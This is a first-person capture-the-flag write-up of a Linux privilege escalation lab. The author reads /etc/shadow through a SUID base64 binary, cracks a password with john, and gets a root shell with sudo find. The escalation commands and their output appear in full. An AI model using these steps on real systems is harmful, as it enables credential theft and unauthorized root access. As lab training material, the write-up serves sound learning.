Linux Privilege Escalation

This challenge is a test to see if you picked up the skills and tools that you practiced with in the earlier tasks. You're given a low privilege user and is just asked to get the contents of flag1.txt and flag2.txt

The user ´leonard´ that you start out with are not able to do much at all. I quickly found out by running find / -type f -perm -04000 -ls 2>/dev/null that the base64 binary has the SUID bit set and we can run this as root.

I ran base64 /etc/shadow | base64 --decode and was able to find the password hash of 'missy'. I was interested to see if I could find any user that had more possibilities for privilege escalations.

After running john to crack her password I logged in as her and found out this:

[missy@ip-10-10-242-206 ~]$ sudo -l
Matching Defaults entries for missy on ip-10-10-242-206:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR
    USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User missy may run the following commands on ip-10-10-242-206:
    (ALL) NOPASSWD: /usr/bin/find

She is allowed to run /usr/bin/find as root. I remember from an earlier challenge that 'find' is on https://gtfobins.github.io/gtfobins with some techniques to escalate privileges.

And I was able to run sudo find . -exec /bin/sh ; -quit and become root.

[missy@ip-10-10-242-206 ~]$ sudo find . -exec /bin/sh \; -quit
sh-4.2# whoami
root
sh-4.2# 

From here we can easily find flag1.txt and flag2.txt

sh-4.2# find / -type f -name "flag1.txt"
/home/missy/Documents/flag1.txt
sh-4.2# find / -type f -name "flag2.txt"
/home/rootflag/flag2.txt